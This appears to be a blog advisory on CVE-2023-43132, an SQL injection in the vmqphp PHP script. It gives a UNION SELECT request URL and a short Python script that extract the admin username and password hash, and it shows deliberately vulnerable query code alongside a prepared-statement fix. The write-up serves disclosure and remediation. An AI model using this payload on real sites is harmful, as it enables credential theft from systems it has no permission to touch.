The security world has recently discovered and assigned CVE-2023-43132, which targets the szvone vmqphp software, version 1.13 and earlier. This vulnerability allows hackers to perform SQL Injection attacks and steal the password hash of the site administrator — all remotely, with no login required.

Let’s break down what this means, how the attack works, and how you can protect your site if you’re using the affected software.

What is szvone vmqphp?

szvone vmqphp is an open-source lightweight PHP script, often used for creating verification code sites and similar utilities. It's popular because it's free, easy to set up, and comes with multiple features right out of the box.

What is SQL Injection?

SQL Injection is a classic attack that takes advantage of poor coding practices. When a web application doesn't sanitize user input, an attacker can inject their own SQL code to interact with the database directly — stealing or changing data without authorization.

Where is the Flaw?

In vmqphp <= 1.13, a key file fails to sanitize user input before using it in an SQL statement. Because of this, an attacker can craft a specific request to force the database to reveal information like the admin password hash.

Although the real code may look different, here’s a simple reproduction of the vulnerable section

// Hypothetical vulnerable code in vmqphp
$id = $_GET['id'];
$sql = "SELECT * FROM user WHERE id = '$id'";  // Dangerous!
$result = mysqli_query($conn, $sql);

Notice how $id is used directly from user input without filtering or prepared statements. If someone sends something like 1 OR 1=1, the query changes in a dangerous way.

Attack Scenario

Let’s say the attacker wants the admin's password hash. Most applications store user passwords as hashes. Even though a hash can't be directly used as a password, hackers can try to "crack" it offline.

Step-by-Step Exploit

1. Find the Vulnerable Parameter: The attacker discovers the id parameter on a page like user.php?id=.

Craft Malicious Input: Instead of a number, the attacker inputs

Full Malicious Request:

`

https://target.site/user.php?id='+UNION+SELECT+1,username,password,4+FROM+user+WHERE+role='admin'--+-

`

4. What Happens: The database sees this and combines rows from the regular users and the admin user(s), exposing the admin's username and password hash in the web page.

Here's how an attacker might automate this with Python

import requests

url = "https://target.site/user.php";
payload = "' UNION SELECT 1,username,password,4 FROM user WHERE role='admin' -- -"
params = {'id': payload}

response = requests.get(url, params=params)
print(response.text)  # Look for the admin username/hash in the output!

References and Security Advisories

- CVE Details for CVE-2023-43132
- Original Chinese Disclosure
- GitHub Project

How to Fix

Upgrade to a patched version as soon as possible! If an official fix is not available, consider editing the code to use prepared statements, like this:

// Safe code using prepared statements
$id = $_GET['id'];
$stmt = $conn->prepare("SELECT * FROM user WHERE id = ?");
$stmt->bind_param("i", $id);
$stmt->execute();

Or at least sanitize your input with filter functions like intval() for numeric IDs.

Conclusion

*If your site runs szvone vmqphp version 1.13 or lower,* you’re at risk. Attackers can steal your admin password hash without logging in. Update your code, sanitize all inputs, and check your software for security advisories like CVE-2023-43132.

For more technical details, see the official NVD page for CVE-2023-43132 and follow the GitHub project for patches and updates.

Timeline

Published on: 09/25/2023 21:15:16 UTC
Last modified on: 09/26/2023 14:48:58 UTC